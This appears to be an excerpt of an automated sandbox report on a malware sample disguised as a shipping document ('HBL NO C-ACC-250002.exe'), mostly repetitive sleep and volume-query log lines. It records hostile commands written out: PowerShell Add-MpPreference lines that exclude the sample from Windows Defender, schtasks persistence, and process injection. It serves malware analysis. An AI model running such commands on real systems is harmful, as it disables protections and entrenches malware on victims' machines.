Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -598797s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -598578s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -598469s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -598140s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -598030s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -597922s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -597808s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -597703s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -597573s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -597469s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -597359s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -597141s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -597031s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -596808s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -596583s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -596453s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -596343s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -596234s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -596125s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -595780s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -595672s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -595562s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -595453s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -595344s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -595219s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -595109s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -595000s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -594890s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -594781s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -594671s >= -30000s
Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164	Thread sleep time: -594562s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 595100	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599124
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 598030
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597922
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597808
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597703
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597573
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596808
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596583
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596453
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596343
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596234
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595780
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595344
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595219
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595109
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 595000
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 594890
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 594781
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 594671
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Thread delayed: delay time: 594562

Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd5e665588b960<
Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4498141381.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllurat
Source: uyDicX.exe, 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd5e7c51370503<
Source: uyDicX.exe, 0000000E.00000002.4497161472.0000000000E97000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

Code function: 9_2_05097B70 LdrInitializeThunk,

9_2_05097B70

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe"
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\uyDicX.exe

Memory written: C:\Users\user\AppData\Roaming\uyDicX.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Process created: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Process created: C:\Users\user\AppData\Roaming\uyDicX.exe "C:\Users\user\AppData\Roaming\uyDicX.exe"	Jump to behavior

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
